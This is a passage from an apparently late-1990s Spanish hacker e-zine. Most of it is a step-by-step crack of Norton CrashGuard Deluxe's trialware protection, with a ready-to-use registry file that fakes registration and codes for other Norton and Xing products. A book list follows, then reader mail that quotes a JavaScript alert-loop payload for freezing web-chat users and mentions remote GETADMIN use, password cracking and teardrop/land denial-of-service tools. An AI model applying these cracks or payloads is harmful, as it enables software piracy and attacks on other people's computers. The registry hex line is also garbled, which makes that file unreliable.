- CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso
- de la libreria comercial RSAGNT32.DLL (encargada de realizar la compra
- virtual) y que existen un referencias a funciones tales como SAInitialize,
- startSalesAgent. Estas van a ser nuestras funciones de aproximacion.
-
- Pulsamos en el boton de Imported Functions (Imp Fn) y hacemos doble
- click en la linea de rsagnt32.startSalesAgent.
-
- Aparecera en el listado lo siguiente:
-
- * Reference To: rsagnt32.startSalesAgent, Ord:000Eh
-
- :00407834 E807F30000 Call 00416B40 ▀ Llamada al asistente
- :00407839 83C408 add esp, 00000008
- :0040783C 66833D0425430000 cmp word ptr [00432504], 0000
- :00407844 742B je 00407871
-
- Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que
- nos encontramos en un bloque de codigo que se encarga de cargar, iniciar,
- ejecutar, terminar el asistente de compra. Buscamos donde puede empezar el
- bloque. Y un poco mas arriba encontramos:
-
- ///////////// INICIO DE BLOQUE ////////////////
- * Referenced by a CALL at Address:
- :00406752 <- desde aqui es llamado el bloque del
- asistente de compra
-
- :004077B0 A1B07B4300 mov eax, dword ptr [00437BB0]
- :004077B5 53 push ebx
- : :
- : :
- * Reference To: rsagnt32.startSalesAgent, Ord:000Eh <- Aqui hemos
- comenzado
- la busqueda
-
- :00407834 E807F30000 Call 00416B40 <- Llamada al
- asistente
- :00407839 83C408 add esp, 00000008
- :0040783C 66833D0425430000 cmp word ptr [00432504], 0000
- :00407844 742B je 00407871
- :00407846 BFE0A54300 mov edi, 0043A5E0
- : :
- : :
- :00407878 5F pop edi
- :00407879 5E pop esi
- :0040787A 5B pop ebx
- :0040787B C3 ret
-
- ///////////// FIN DE BLOQUE ////////////////
-
- Ahora una vez que conocemos desde donde hemos llamado al bloque,
- usamos el menu Goto -> Goto Code Location y escribimos el desplazamiento
- 406752. Aqui observamos lo siguiente:
-
- * Possible Reference to String Resource ID=00001: "Turnkexe"
-
- :00406748 C705C826430001000000 mov dword ptr [004326C8], 00000001
- :00406752 E859100000 call 004077B0 <- Entrada en el
- bloque anterior
- :00406757 66392D04254300 cmp word ptr [00432504], bp
- :0040675E 0F84F4010000 je 00406958
- :00406764 BF34254300 mov edi, 00432534
-
- Ummmma. Aqui ya tenemos una bonita direccion de memoria (variable
- global) para usar con Softice.Pero antes añadamos la libreria RSAGNT32.DLL.
- al la lista de dll que sabe manejar el Softice.
-
- Abrimos el Symbol Loader de Softice y en el menu Edit -> Softice
- Initialization Settings -> Exports añadimos RSAGNT32.DLL. Abrimos el Symbol
- Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce:
-
- Bpx 406752
- Bpx startSalesAgent
-
- Pulsamos F5 y cuando aparezca la ventana de "Welcome to Symantec
- Trialware" pulsamos sobre el boton "Buy Now". Aparecer en el Softice en el
- primer breakpoint Bpx 406752
-
- Seguimos ejecutando, paramos en la funcion startSalesAgent
-
- cs:00407834 E807F30000 Call rsagnt32!startSalesAgent <- Asistente
- de compra
- cs:00407839 83C408 add esp, 00000008
- cs:0040783C 66833D0425430000 cmp word ptr [00432504], 0000
- cs:00407844 742B je 00407871 <- si salta, has
- comprado
-
- Nopeamos el asistente de compra. Esto es, sustituimos la llamada por
- instrucciones inonfesivas. En : 00407834 90 90 90 90 90
-
- Si estudiamos je 00407871 y hacemos que no vaya a la direccion 407871
- aparece una ventana contandonos que se ha grabado un archivo llamado
- Rslicens. txt pero esto no hace que se active el proceso de compra, este
- nos es el camino.
-
- Otra comparacion interesante se encuentra despues de la rutina de
- entrada al bloque
-
- cs:00406752 E859100000 call 004077B0 <- Bloque anterior
- cs:00406757 66392D04254300 cmp [00432504], bp <- Comparacion Interesante
- cs:0040675E 0F84F4010000 je 00406958
- cs:00406764 BF34254300 mov edi, 00432534
-
- Cuando nos encontremos sobre la direccion cs:0040675E cambiamos el
- flag de cero que estara activada (Z) y la colocamos a desactivada (z).
- Ahora el programa seguira en cs:00406764. Pulsemos F5 y veamos que ocurre.
-
- Ha aparecido una ventana que nos dice que esperemos mientras nuestro
- programa esta siendo preparado (Please wait while your software is being
- prepared). Al fin, se "PREPARA EL SOFTWARE"
-
- Nota: Si el proceso anterior se repite muchas veces conviene que
- cerremos todos los programas que tengamos activo e incluso el mismo Norton
- Crashguard que tengamos en la barra de tareas.
-
- Una vez completado este proceso habremos comprado virtualmente el
- Norton crashguard Deluxe.
-
- Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y
- CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y
- LICENSE.xxxxxx (numeros de licencia) Este proceso realizado en tiempo real
- con el Softice no trae ningun problema pero a la hora de hacer los parches
- no encontraremos problemas con los checksum .Pero..TRANQUILOS QUE TODO
- TIENE SOLUCION.
-
- MODIFICANDO EL REGISTRO
-
- Usaremos una herramienta muy util para los crackers el programa
- Regmonitor (si no lo tienes consiguelo). Observamos unas variables que lee
- el programa (no registrado) al principio y tenemos:
-
- HKCR\ultxfile\Format\MSHAEZDC\write /* Esta nos suena */
- HKCR\ultxfile\Format\MSHAEZDC\xlate
- HKCR\ultxfile\Format\MSHAEZDC\open /* Esta nos suena*/
-
- Bien, basta comparar los valores antes y despues de "preparar" el
- software, para darse cuenta que la unica modificacion la realiza en open.
- Cuando esta registrado su valor es:
-
- HKEY_CLASSES_ROOT \ultxfile\Format\MSHAEZDC\open
- 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00
- 08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00
-
- Esta es la forma en que se comunica al resto de utilidades que la
- compra ya ha tenido exito. Y YA ESTA, basta con introducir este valor en el
- registro para que quede registrado el Norton CrashGuard Deluxe 3.0
-
- MSHAEZDC corresponde al programa en cuestion a comprar. Usando el
- regmonitor vemos que clave busca el programa a desproteger y anotamos el
- codigo (MSHAEZDC).
-
- Esta tactica se ha probado con exito con las siguientes aplicaciones
- protegidas por la compañia Release Software Corporation : Norton utilities,
- Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder,
-
- Creando un archivo de registro ya tenemos hecho un crack no
- destructivo ya que no modifica ningun ejecutable.
-
- ----------------------------------- Cortar por aqui --------------------------
- REGEDIT4
- ; (c) ESTADO+PORCINO 1998
- ; Modificacion de registro para Norton Crash Guard Deluxe
- ; Mr.Red & otras hierbas
- ;
- [HKEY_CLASSES_ROOT\ultxfile\Format\MSHAEZDC]
- "open"=hex:00,00,00,00,00,0
- ffb
- 0,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00
- ,00,00,00,00,00,00,00,00,00,00
-
- ----------------------------------- Cortar por aqui --------------------------
-
- Para los demas programas que usan esta proteccion tenemos:
-
- Xing MPEG Encoder codigo -> MSHVEMAV
- Norton Utilities codigo -> MSHVEM0E
- Norton Unisntaller codigo -> MSHW2EHL
-
- Bueno ha sido largo pero ha merecido la pena.
-
-
- MORALEJA: Si quieres poner una puerta, procura que no sea de papel.
-
- Es el colmo de la incompetencia. Confias la venta de tu producto a un
- empresa que proporciona una proteccion ridicula que no vende tu producto si
- no que practicamente lo regala. Por que no invertir la millonada que
- Symantec habra pagado a Release Software Corporation encontrar a unos
- buenos programadores en ensamblador que hicieran una proteccion decente.
- Ademas, esta compañaa protege y vende productos de mas empresas a parte de
- Symantec. Basta pasarse por su web http://www.releasesoft.com y comprobar
- lo orgullosos que estan de sus clientes. Realmente, no creo que esta
- compañia dure mucho.
-
- La importancia de este articulo radica en que se ha conseguido
- solventar con exito la proteccion de una casa de Software dedicada a
- proteger y vender. Quedan a nuestros pies cientos de programas, con una
- proteccion de papel, gracias a la incompetencia de una avariciosa compañia.
- Mejor seria que diera los programas gratis, y de dejara de hacer el
- ridiculo.
-
- Esperamos vuestras opiniones, sugerencias y ensayos en
- estadoporcino@hotmail.com Recordad bebed de la fuente, buscad a +ORC en la
- red.
-
- Mr_PinK & WKT ( WHISKEY KON TEKILA )
- http://wkt.home.ml.org
- http://wkt.mypage.org
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
- │ Un poco de cultura: Libros │
- \----------------------------------/
-
-
- Bien, en primer lugar, esta va a ser, digamos, la nueva seccion del
- e-zine. Aqui, a partir de ahora y en adelante a los siguientes e-zines,
- comentaremos distintos titulos de libros relacionados con el tema, y por
- supuesto donde podreis encontrarlos y su precio (si es q se sabe :o).
-
- Dicho esto, vamos a empezar:
-
- - Cyberpunk, outlaws and hackers on the computer frontier. Katie Hafner and
- John Markoff. Simon & Shuster, New York 1995.
-
- Libro de lectura obligada, engloba todos los casos mas conocidos sobre el
- underground, desde Kevin Mitnick hasta el Hacker de Hannover. De momento
- este libro solo lo he encontrado en ingles :o(, pero bueno, podeis buscarlo
- en espa±ol tambien, mirar por su ISBN :0-684-81862-0. Unas 1.500 a 2.000 pts
-
- - Hackers: Heroes of the computer revolution. Steven Levy. Dell Books, New
- York, 1994.
-
- Otro de los grandes libros sobre el tema. Steven Levy es un autor expe-
- rimentado sobre el tema de los ordenadores, este es su tercer libro. Tambi-
- en en ingles, pero como ya dije antes, puedes buscarlo por su ISBN :0-385-
- 31210-5. 1.500 pelas.
-
- - Hacker Crackdown, The: Law and Disorder on the Electronic Frontier. Bruce
- Sterling. Bantman Books, 1993.
-
- Uno de los libros mas famosos sobre el mundo de los hackers. En este
- libro, el autor examina el pasado, presente y futuro del underground, desde
- sus principios, pasando por MoD y LoD hasta, de nuevo, Mitnick. Otro mas en
- ingles. Su ISBN: 0-553-56370-X.
-
- - Huevo del Cuco, El. Clifford Stoll, 1990.
-
- Que decir de uno de los libros mas famosos sobre el underground. Aqui tie-
- nes toda la historia del conocido Hacker de Hannover, toda una autentica
- historia. ISBN: 0-671-72688-9. Sobre las 2.000 pelas.
-
- - Maximun Security: A Hacker's Guide to protecting your internet site and
- network. Anonymous, SAMS Net, Indianapolis, 1997.
-
- Este es uno de los libros "tecnicos" mas famosos y utiles q conozco. En es-
- te libro encontraras todo lo necesario para aprender sobre seguridad, desde
- el usuario mas principiante hasta el administrador de un sistema, aqui tie-
- nes absolutamente todas las respuestas a tus preguntas. Libro escrito por
- un hacker ya experimentado. El libro incluye el ultimo manifiesto escrito
- por The Mentor, y una de las mejores citas sobre el autor que he leido hasta
- ahora. La cita dice asi: "El autor de este libro vive felizmente en el sur
- de California, con un Sun SPARCStation, un IBM RS-6000, dos Pentium, varios
- MicroVax, y su mujer" :o), bueno, dejemonos de coñas, aqui esta su ISBN:
- 1-57521-268-4. Altamente recomendado :o). Un poco carillo, entre 7.500 y
- 10.000 ptas. depende el sitio donde lo compres.
-
- - Masters of Deception: The gang that ruled cyberspace. Michelle Stalla &
- Josua Quitter, Harper Collins, 1995.
-
- Libro imprescindible si quieres conocer la autentica historia sobre los MoD.
- Este libro se basa en los pasos seguidos por Phiber Optik (aka Mark Abene) y
- sobre sus andanzas por Legion of Doom, 2600 y la fundacion de Masters of
- Deception. Muy Bueno y entretenido. ISBN: 0-060-92694-5. 1.500 ptas.
-
- - Mundo Digital, Un. Nicholas Negroponte. RandomHouse, 1995.
-
- Un libro muy entretenido, escrito por un gran autor y gran estudioso de los
- ordenadores y a lo que de tecnologia se refiere. Este libro lo hay en espa-
- ñol, lo que no se es la editorial fijo, asin que vuelve a buscar por su ISBN
- 0-679-43919-6. Sobre 2.000 pelas.
-
- - Takedown.Tsutomu Shimomura, John Markoff. Hyperion, 1996.
-
- Otro de los grandes libros sobre los grandes del Hack, en este caso se
- cuenta como se capturo a Kevin Mitnick. Este libro esta escrito por el autor
- de su captura, muy entretenido. ISBN: 0-786-88913-6. Sobre las 2.000 pelas.
-
- - UNIX in a Nutshell: A Desktop Quick Reference for Solaris V and 2.0.
- Daniel Gilly. O'Reilly & Associates, 1992.
-
- Trannnnnnnnquis, aunque parezca que el librito ta un poco anticuado, no pasa
- na, acaba de salir la segunda edicion actualizada para el SVR4. Uno de los
- libros mas famosos para empezar a conocer este sistema operativo. 2.000 ptas.
- ISBN: 1-585-92001-5
-
- - UNIX Unleashed. Sams Development Team. SAMS Publishing, Indianapolis 1994.
-
- Acojonante, es la unica palabra que se me ocurre para describir este pedazo
- de libro. Aqui encontraras todo lo que necesites saber del SVR4. Escrito por
- gurus del UNIX. ISBN: 0-672-30402-3. Sobre unas 7.500 a 8.000 ptas.
-
-
- Bueno, de momento esto es todo lo que os puedo ofrecer de libros, pero no os
- preocupeis, el proximo e-zine, mas :o).
-
- mac_crack@usa.net
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ┌─────────────────┐
- < EL LECTOR OPINA >
- └─────────────────┘
-
- Otra vez ya estamos con vuestra seccion, pero os pedimos que penseis
- claramente lo que nos escribiis, ya que sige habiendo mucho desaprensivo
- que solo quiere entrar en computadoras ajenas y similares, esto es una
- tonteria, por lo que no hace falta que escribais }:-) Al igual que tampoco
- hace falta que escribas un mail solicitando que os demos clases de hack,
- menuda tonteria. Okis?
-
- Por otro lado esta seccion esta mejorando, ya que por fin los lectores
- se empiezan a contestar entre ellos, y esto es lo que precisamente
- pretendiamos con esta seccion y nos alegra mucho ;-) y ya basta de rollos
- y que comienze el mail de nuestros fantasticos lectores.
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: PoP <popup@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: novato...... en IRC soy ^PoP^ :)
-
- Hace un mes, mas o menos, me pasaron vuestra web, y me parecio
- bueniiiiiiisima. Estoy leyendo todos los txt, incluidos los e-zines(que es
- muy buena..... sera pq es la primera ke leo :), y ademas es baratita...
- jeje, pero de muchas cosas nomentero...
-
- Es por esto ke os "maileo" para sugerir ke pongais en el e-zine o en
- kualkier otro sitio(kreeme ke lo buskare) un diccionario en el ke vengan
- palabras teknikas ya ke eso ayudaria mucho.
- Estoy komo loko por hacer todo eso de lo ke hablais en el e-zine(mi novia
- dice ke kiero mas a mi PC ke a ella :) ) pero veo ke es totalmente
- necesario tener al menos un linux, controlar el lenguaje C y sobre todo
- saber komo se kompila. Bueno el kaso es ke me veo inkapaz de acceder a
- internet por otro S.O. ke no sea el Win95 (o NT ke es lo mismo a mi
- parecer), ya ke intente instalar linux (la version s.u.S.e 5.0 y no me dio
- muy buen resultad( a parte de no entender ni papa) y por eso os pido
- ayuda...
- Me gustaria (si no es mucho pedir) ke me sugirierais ke version de linux
- instalar(tengo la suse 5.1 y la red hat 5.0, aunke kompraria otra si hace
- falta) para poder iniciarme (y algun tipo de informacion sobre los comandos
- de linux). Ya he preguntado por ahi y me ha dicho ke pruebe kon la
- SlackWare... . Pero sobre todo un libro para aprender lenguaje C y saber
- kompilar, para pardillos komo yo ke empiezan del zero_absoluto( en lo ke a
- lenguaje C se refiere).
- Enga, no os doy mas la tabarra.... solo felicitaros por la pag y por el
- e-zine (sois mu wuenos :) ) y seguid asi! Accedeis a ayudar y es dificil
- enkontrar ayuda sobre hack para los novatos komo yo ke kieren llegar ha ser
- komo vusotros... y olvidar el w95 de una puñetera vez!
- Espero vuestro mail y......... Muxxxxxxxas Gracias!
-
- Atentamente.... Jose Antonio Lopez (Murcia)
-
- <------>
-
- [ Thx, Hombre lo referente a las versiones linux eso depende un poco de
- tus gustos, por ejemplo:
-
- - Red Hat or SuSe = Facil de instalar y mantener.
- - Slackware = Muy buena.
- - Debian = Enfocada a los programadores.
-
- Nuestro consejo es que empiezes con RH 5.0 o SuSe que son faciles y
- despues pruebes con Slackware o Debian. Como dices bien en tu mail es
- aconsejable que pilles algun libro sobre Linux y C. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 24 Apr 1998 19:52:41 -0700 (PDT)
- From: hardbody@xxxxxxxxxxxxxx
- Subject: help
-
- Señor Conde Vampiro
-
- Por favor, ayudeme, yo lo que mas quiero en la vida es ser hacker, me
- fascina la idea de entrar a otro computador sin que este se de cuenta,
- estoy en segundo semestre de Ingenieria de Sistemas y tengo 17 años.
-
- Por favor, envieme su respuesta lo mas pronto posible.
-
- Atte Zeus
-
- <------>
-
- [ Pues con esa filosofia que tienes no llegaras muy lejos que digamos,
- ya que el hacking no consiste en entrar en computadoras ajenas y
- que el dueño no se de cuenta. Haver si lees este ezine con mas
- claridad. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 26 Apr 1998 17:04:13 GMT
- From: "Ferran Fontcuberta ( Vs )" <versus@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Pos vaya ;-)
-
- Pues... una sugerencia, podrias comprimir la revista en zip o gz o... ya
- que okupa menos y se tarda menos en bajar (aunke tengan el mismo tamaño)
-
- Tanxs.
-
- Vs
- versus@xxxxxxxxxxxxxx
- com
-
- <------>
-
- [ No me digas!!, pero como ya hemos dicho en alguna ocasion no queremos
- comprimirla ya que asi es llegar y leer. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 30 Apr 1998 12:24:38 GMT
- From: "Francisco Rodriguez Casal (Pac\4s)" <pacs@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Copiar diskettes
-
- Hola:
-
- Os queria pedir ayuda.
-
- Quiero copiar un diskette que esta protegido contra copia. Se trata de
- un programa reciente que incluye un diskette llave (ellos le llaman
- TOKEN) creo que la proteccion consiste en un error de sector
- intencionado en la pista 28 cara 1 el cual no es reproducido en el disco
- destino pot los copiones.
-
- He intentado copiar el diskette con varios copiones y no lo he
- conseguido. Tampoco controlo mucho del tema.
-
- Por supuesto, no pretendo piratear ningun programa, lo que intento es
- hacer una copia de seguridad de dicho disquete ya que si se daña pierdo
- la licencia. ;-)
-
- Gracias.
-
- Un saludo.
-
- __________________________________________________________
- Universidad de La Coruña
- Servicios Informaticos de Gestion
-
- Francisco Rodriguez Casal
- Email: pacs@xxxxxxxxxxxxxx
- __________________________________________________________
-
- <------>
-
- [ Un buen copion deberia ser capaz de copiarlo, por lo que deberias seguir
- buscando alguno que satisfaga tus necesidades. Ademas siempre puedes
- aplicar "coding rulez" o sea que como crees saber donde esta la proteccion
- la puedes intentar anular. Pasate por la seccion de crack, para pillar
- tools para este trabajo. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 02 May 1998 10:27:38 GMT
- From: <ardarj@xxxxxxxxxxxxxx>
- Subject: CONSULTA
-
- HOLA J.J.F. SOY FEAR, SUPONGO QUE NO SABEIS QUIEN SOY (SEGURO QUE NO).
- BUENO, OS PODRIA DECIR QUE SOY UN USUARIO DE INTERNET A QUIEN LE GUSTARIA
- APRENDER A SER UN HACKER, NO SE SI ESO ES POSIBLE ASI COMO YO LO ESTOY
- PLANTEANDO, PERO ESPERO QUE PODAIS AYUDARME, DANDOME CONSEJOS Y
- EXPLICANDOME LAS COSAS QUE DEBO DE HACER, ME REFIERO A QUE VOSOTROS
- SEREAIS MIS PROFESORES Y YO VUESTRO FIEL ALUMNO. SEGURO QUE RECIBIREIS
- CIENTOS DE MAIL'S COMO ESTE, PERO YO OS JURO SI ME ENSA╤AIS, VAIS A PODER
- ESTAR ORGULLOSOS DE MI.
- DE TODAS FORMAS, ME GUSTARIA FELICITAROS POR LA GRAN PAGINA QUE TENEIS,
- SEGURO QUE SIRVE DE AYUDA A MUCHAS PERSONAS Y POR ULTIMO ME GUSTARIA QUE
- AUNQUE PASAEIS DE MI ME ACLARARAIS UNA DUDA:
-
- - EN VUESTRA PAGINA HAY UN APARTADO QUE EXPLICA COMO BLOQUEAR UN ORDENADOR
- A TRAVES DE UN CHAT. YO LO INTENTE HACER DE ESTA FORMA:
- 1.- ME CONECE╔ AL BUSCADOR OLE.
- 2.- LE DI AL APARTADO DE CHAT'S.
- 3.- ESCOGI EL APARTADO "DIVERSION"
- 4.- ESCOGI EN CANAL "AMOR"
- 5.- UNA VEZ DENTRO, HABRO EL CANAL PRIVADO DE OTRO USUARIO.
- 6.- HABLE UN POCO CON EL Y CUANDO PAS╙ DE MI, ESCRIBI LO QUE
- VOSOTROS DECIAIS QUE HABIA QUE ESCRIBIR O SEA ESTO
-
- <script language=javascript>for(i=1;i<2;) { alert("lo siento tenia que
- probarlo con alguien")}</script>
-
- 7.- LE DI AL INTRO Y.... NO PAS╙ ABSOLUTAMENTE NADA, TODO LO QUE
- HABIA ESCRITO APARECI╙ EN EL CANAL PRIVADO, Y EL TIO ME
- PREGUNTO QUE PORQUE HABIA PUESTO ESO.
-
- BUENO ME GUSTARIA QUE SI PODEIS Y QUEREIS ME DIJERAIS QUE ES LO QUE HE
- HECHO MAL, O LO QUE NO HE HECHO. GRACIAS.
-
- EMAIL= ardarj@xxxxxxxxxxxxxx
-
- <------>
-
- [ Como ya hemos dicho, no damos clases privadas ni nada por el estilo.
- Nuestro consejo que es estudies mucho todo lo que puedas. Parece que hay
- alguna web que enseñan a escribirnos solicitando clases porque todos
- escribiis lo mismo!!!!.
- Si hubieras leido el txt con mas cuidado, verias que pone que no siempre
- funciona debido al CGI de los Web Chat, por eso antes de ejecutar el
- script, escribe '<' para saber si funciona o no. Lo mas aconsejable es
- volverse a leer la guia. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: <quasar@xxxxxxxxxxxxxx>
- To: mack_crack@usa.net
- Subject: [JAU....]
-
- Hola loco....
-
- La verdad es ke iba a encriptarlo con pgp pero para decir esta tonteria
- paso....
-
- Solamente era para decirte ke tu gⁿeb es una de las ke hay ke ir
- viniendo cada x tiempo para ver las novedades y tal y pascual....por lo
- ke en mi opinion, una mas, deberia ser muy dinamica y ligera y asi
- daaria gusto en venir...bla bla bla y mas bla....
-
- Resumiendo mucho ke no tengo ganas de enrollarme: el contenido de la
- gⁿeb...muy OK
- pero macho......DESCARGALA DE JAVA KE SE HACE ETERNO!!!....
-
- A lo mejor un poco directo pero claro.....ok?...
-
- por cierto, a ver si podeis re-editar el articulo de Nobody sobre el
- netstat y nbtstat ke la peña me pregunta siempre lo mismo y asi, en vez
- de enrollarme, le paso el articulo ese...os lo digo a vosotros porke
- creo ke teneis contacto....ok?
-
- y ya os enviare algo un dia ke tenga un minimo de ganas ......
-
- cuidaros y no cerreis los dos ojos al dormir.....;)
-
- contestad en:
-
- quasarr@xxxxxxxxxxxxxx
-
- ostias no he utilizao el remailer...psss...da igual...lo dicho....
-
- QuasaR .......... progressing
-
- ressing
-
- <------>
-
- [ Hi
-
- Pues si, nuestras webs son de las q cada POCO tiempo se actualizan con mas
- ficheros, links y si, tb java. Ya se q se hace eterno, pero si te has leido
- la segunda pantalla de nuestra web pone entrada CON JAVA y entrada SIN JAVA,
- o sea q en lo referente a tu consejo de descargarla de java, mmmm, paso, ya
- he tenido q hacer dos entradas, coje la q mas te convenga ;-). En lo
- refererente al articulo de Nobody, ya le mandaremos un mail a ver q dice.
- Byezz ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Dany" <kawa.saki@xxxxxxxxxxxxxx>
- Subject: Win NT
-
- Hola,
-
- Estoy buscando Caballos de Troya.
- Tanto el codigo ( Para Vbasic o Pascal ) como los programas ya hechos. Es
- para Win NT, para tomar las claves. Alguna Sugerencia???
-
- Dany,
-
- CodeBracker en el IRC Hispano
-
- <------>
-
- [ Pues de eso alguna cosa hay, lo mejor que puedes hacer es visitar alguna
- web sobre Hack NT y ya pillaras tools. Para Vbasic si que hemos visto
- pero en pacal nop. Pillate el winsock caballo de troya. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 06 May 1998 09:25:01 GMT
- From: "Sanye" <sanye@xxxxxxxxxxxxxx>
- Subject: hackers JJf Hackers
-
- me gustaria recibir informacion sobre los programas y pasos que tendria
- que seguir para acceder a sistemas remotos como los ordenadores de mi
- amigos por ejemplo, o servidores de red de empresas o cosas asin Te pido
- ayuda ya que seguro que tu sabes cuales son los programas y tambien los
- pasos a seguir.
-
- ea3ckx@xxxxxxxxxxxxxx
-
- <------>
-
- [ hhuummmm, creo que para eso esta este ezine o sea que lee. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 11 May 1998 10:47:55 GMT
- From: chipiona <chipiona@xxxxxxxxxxxxxx>
- To: "'silicio@xxxxxxxxxxxxxx"
- Cc: "'zen@xxxxxxxxxxxxxx"
- Subject: SOLICITO_AYUDA, POR_FAVOR
-
- Imploro a quien me pueda ayudar, que me eche un cble en esto.
- Ya se que como indicais en vuestras paginas la mayoria de vosotros, esto es
- ilegal y solo lo mostrais a efectos educativos, y bajo la responsabilidad
- del que lo acepte. YO ACEPTO ESA RESPONSABILIDAD.
- Os explicare el problema. Tengo una serie de programas demo de gestion de
- clinica veterinaria. Todos estan limitados de alguna forma, la mayoria de
- llos en la cantidad de clientes que les puedo meter (maximo de 25 clientes),
- y otro que esta limitado por la fecha (1/4/98, que ya tengo controlada
- mediante el DATE CRACKER), pero tambien esta limitada la base de datos
- indicandome cuando craqueo la fecha que no puede aceptar el registro porque
- es superior a los seis meses de evaluacion.
- ¿Hay alguna forma o programa que me podais indicar para eliminar estas
- limitaciones?. Conque me funcione uno de los programas me avio.
-
- Mi nombre es Jose Javier y mi direccion de correo es como veis
- CHIPIONA@xxxxxxxxxxxxxx y no os asusteis del nombre porque es el correo
- de la oficina donde curro.
-
- GRACIAS A TODOSS
-
- <------>
-
- [ Hombre, para empezar son programas demos y esta muy mal por tu parte
- que los uses para obtener beneficio economico, como estas haciendo.
- Lo mejor que puedes hacer para crackearlos, es buscar algun crack
- especifico para el programa en cuestion. Pasa por nuestra seccion de
- crack para pillar alguna tool. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 07 May 1998 05:13:14 GMT
- From: Marco Demonte <mdemonte@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: mmmm.. pena
-
- Sr. Vampiro ;-)
-
- Se que el tiempo que ocupara en leer esto es tiemo perdido pero no hay
- otra manera para aprender.....
-
- Como se comienza a crackear.. algun documento para empezar o algo
- asi.. Ya que estoy interesado en eso por que tengo una lista ...
-
- Le comento que soy de Mexico y hace un par de años estuve estudiando
- mucho respecto al phreaking , aqui en Mexico rompiamos con 2600hz y
- utilizaba protocolo ccitt r2 por lada 800 nacional, era una maravilla,
- tambien con 2600hz para lada 800 internacional y tambein funcionaba....
- Si te interesa podria pasarte algunos tips que en otros paises podrian
- funionar como la intervencion de llamadas en sistemas ccirr r2..
-
- Tambien se algo de cululares....
-
- Mil gracias por tu tiempo
-
- Marco
-
- <------>
-
- [ A que esperas!!!! envia los trucos al ezine ;-) y ya sabes escribe algun
- articulo de phreak. Para crackear hay varios documentos de como comenzar.
- Pasate por nuestro web ya que alguno hay disponible. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 12 May 1998 17:40:37 GMT
- From: Anonimo <prophet@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: {CyBoRg}, SHG
-
- Hola a todos me parece cojonuda vuestra revista, escribo este mail
- para contestar un mail que lei sobre una que decia que querias cosas
- de NT, y que el GETADMIN no funciona remotamente. Bueno lo primero, el
- getadmin funciona remotamente y lo he probado y va, porque no pruebas
- hacer lo siguiente desde MS.DOS:
-
- GETADMIN \\ip\nombre usuario
-
- No se habra ocurrido utilizar el getadmin con el usuario invitado porque
- no va con ese usuario.
-
- Cosas de hack de NT, nunca se te ha ocurrido explorar los recursos
- compartidos de NT que trae ocultos,, ah pero eso no lo sabiais, :))))).
- Hay una buena utilidad por ahi que se llama NAT que os ayudara para el
- NBTSTAT famoso, ya que le podreis poner un dicionario y lo pasa. Que mas
- utilizar el l0pth, va genial si no tiene instalado el SP3. Hay muchas
- cosillas.
-
- Bueno otro asunto comentaba de hacer taeardrop, land, etc en windows,
- pues gente es posible hacerlo, hay un sitio que tiene el programilla.
-
- *****Censurad la url si quereis ******
- www.aggressor.net
-
- Bueno gente me despido y o quiero dar mas la tabarra. Hasta otra. Por
- cierto cuando metamos los 30 megas de nuestra web, pondremos un link a
- vuestro zine,
-
- Ad10, bye
-
- ++++++++++++++++
- {CyBoRg}
- SHG.....
- ++++++++++++++++
-
- <------>
-
- [ Por fin, los propios lectores se contestan entre si :)))
- Okis, ya nos pasaras el url del grupo y nosotros tb os pondremos un
- link.
- Thx's por los cumplidos y nos gusta que otros grupos nos saluden, ya
- sabeis que podeis escribir algun arti, estaremos encantados de
- publicarlo. Saludos de - J.J.F. / HACKERS TEAM - ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Fco. de Angel Fernandez-Pacheco" <fdeangel@xxxxxxxxxxxxxx>
- Subject: Re: E-Zine
-
- Hola!!!
- Lo primero es felcitasros por el E-Zine que esta muy guapo, luego otra
- cosa es si puedo colaborar en traducciones de textos en vuestra pagina.
- Sludos.
-
- DataCrack
-
- <------>
-
- [ Pues ya sabes, traduce lo que quieras y lo envias al buzon y lo pondremos
- en el ezine :), la gente nos pide traducciones de articulos de pkreak,
- o sea que ya te hemos dado trabajillo.
- Esta genial que querais colaborar, cuantos mas, mejor para todos. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 14 May 1998 03:00:02 GMT
- From: Ayala <ayala@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: (sin asunto)
-
- hola, estoy buscando a un maestro, alguien que pueda iniciarme
- en la entrada a sistemas informaticos. Si puedes ayudarme, hazmelo
- saber, gracias.
-
- <------>
-
- [ Ya estamos como siempre!!, que no ayudamos a la gente para que entre
- en los sistemas ajenos y tampoco damos clases privadas, okis ? ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 20 May 1998 02:37:32 GMT
